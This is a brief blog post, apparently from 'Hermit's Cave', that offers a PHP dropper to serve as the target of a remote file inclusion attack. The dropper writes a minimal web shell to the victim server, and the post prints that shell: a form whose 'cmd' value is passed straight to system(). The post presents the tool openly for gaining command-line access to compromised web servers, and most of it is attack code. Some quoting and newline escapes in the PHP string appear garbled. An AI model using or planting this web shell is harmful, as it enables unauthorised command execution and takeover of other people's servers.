Sometimes you just need a quick PHP webshell to complement your RFI vulnerability you’ve uncovered. There are plenty of “fancy” ones with lots of features, but I prefer simple, effective, command-line equivalent access any day. If you’re of that persuasion as well, just use this as the target of your RFI to give yourself Hermit’s Stupidly Simple WebShell (HSSWS). Enjoy!
Don’t forget to modify the shell path!
<?php
$newShell="/path/to/hssws.php";
$shellCode="<HTML><BODY>n<FORM METHOD="GET" NAME="myform" ACTION="">n<INPUT TYPE="text" NAME="cmd">n<INPUT TYPE="submit" VALUE="Send">n</FORM>n<pre>n<? if($_GET['cmd']) { system($_GET['cmd']); }?> n</pre>n</BODY> </HTML>";
file_put_contents($newShell, $shellCode);
?>
The resultant file will contain this simple shell (on the webserver that processed the above):
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<? if($_GET['cmd']) { system($_GET['cmd']); }?>
</pre>
</BODY> </HTML>
Hermit's Cave 